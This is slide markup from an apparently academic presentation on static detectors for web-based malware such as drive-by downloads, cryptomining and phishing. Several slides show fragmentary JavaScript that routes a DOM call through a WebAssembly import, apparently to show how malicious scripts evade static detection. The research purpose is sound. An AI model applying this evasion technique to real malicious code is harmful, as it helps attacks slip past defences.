      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2267801" y="3106376"/>
            <a:ext cx="1063085" cy="568706"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097280" y="866402"/>
            <a:ext cx="932072" cy="1125417"/>
            <a:chOff x="4881691" y="2999081"/>
            <a:chExt cx="932072" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="139" name="Google Shape;139;p28"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881691" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name="Google Shape;140;p28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881963" y="3367682"/>
              <a:ext cx="9318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300"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Drive-by</a:t>
              </a:r>
              <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">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Download</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="2227315"/>
            <a:ext cx="914400" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="914400" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="142" name="Google Shape;142;p28"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="143" name="Google Shape;143;p28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5002122" y="3377411"/>
              <a:ext cx="7041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300"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Crypto- </a:t>
              </a:r>
              <a:endParaRPr sz="13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mining</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="3600791"/>
            <a:ext cx="941048" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="941048" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Google Shape;145;p28"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="Google Shape;146;p28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897235" y="3387138"/>
              <a:ext cx="933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FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Phishing</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3345822" y="3643986"/>
            <a:ext cx="1939011" cy="64633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Static malware detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="746545"/>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Static Web-Based Malware Detectors</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;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pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Google Shape;150;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181434" y="2439906"/>
            <a:ext cx="386080" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448407" y="2443894"/>
            <a:ext cx="386080" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156163" y="2370892"/>
            <a:ext cx="465624" cy="569097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4835259" y="2197736"/>
            <a:ext cx="1750128" cy="1745063"/>
            <a:chOff x="5050857" y="2811638"/>
            <a:chExt cx="1750128" cy="1745063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="Google Shape;154;p28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050857" y="2811638"/>
              <a:ext cx="1067100" cy="1062000"/>
            </a:xfrm>
            <a:prstGeom prst="donut">
              <a:avLst>
                <a:gd name="adj" fmla="val 8904"/>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5" name="Google Shape;155;p28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2697115">
              <a:off x="6072292" y="4092638"/>
              <a:ext cx="758372" cy="229739"/>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6" name="Google Shape;156;p28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2729819">
              <a:off x="5875735" y="3745216"/>
              <a:ext cx="342394" cy="99281"/>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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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609" name="Google Shape;609;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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610" name="Google Shape;610;p55"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Google Shape;611;p55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="19202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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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612" name="Google Shape;612;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="2286000" cy="16459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613" name="Google Shape;613;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602836" y="3018601"/>
            <a:ext cx="3305012" cy="347472"/>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18" name="Google Shape;618;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9591354">
            <a:off x="5486129" y="2824091"/>
            <a:ext cx="524251" cy="487656"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 1315455"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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19" name="Google Shape;619;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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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625" name="Google Shape;625;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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626" name="Google Shape;626;p56"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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628" name="Google Shape;628;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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629" name="Google Shape;629;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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639" name="Google Shape;639;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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640" name="Google Shape;640;p57"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Google Shape;641;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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642" name="Google Shape;642;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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643" name="Google Shape;643;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590348" y="2280314"/>
            <a:ext cx="4521297" cy="640080"/>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8" name="Google Shape;64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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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654" name="Google Shape;654;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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655" name="Google Shape;655;p58"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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657" name="Google Shape;657;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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658" name="Google Shape;658;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590348" y="2954867"/>
            <a:ext cx="2926080" cy="310896"/>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3" name="Google Shape;663;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33</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2257425" y="3087214"/>
            <a:ext cx="3289628" cy="127476"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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670" name="Google Shape;670;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547053" y="2687162"/>
            <a:ext cx="3383280" cy="685800"/>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671" name="Google Shape;671;p59"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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673" name="Google Shape;673;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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674" name="Google Shape;674;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471482" y="3257363"/>
            <a:ext cx="731520" cy="164592"/>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9" name="Google Shape;679;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469997" y="2121408"/>
            <a:ext cx="731520" cy="164592"/>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80" name="Google Shape;680;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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="2505456"/>
            <a:ext cx="3675887" cy="253915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A626A4"/>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595959"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Google Shape;686;p60"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
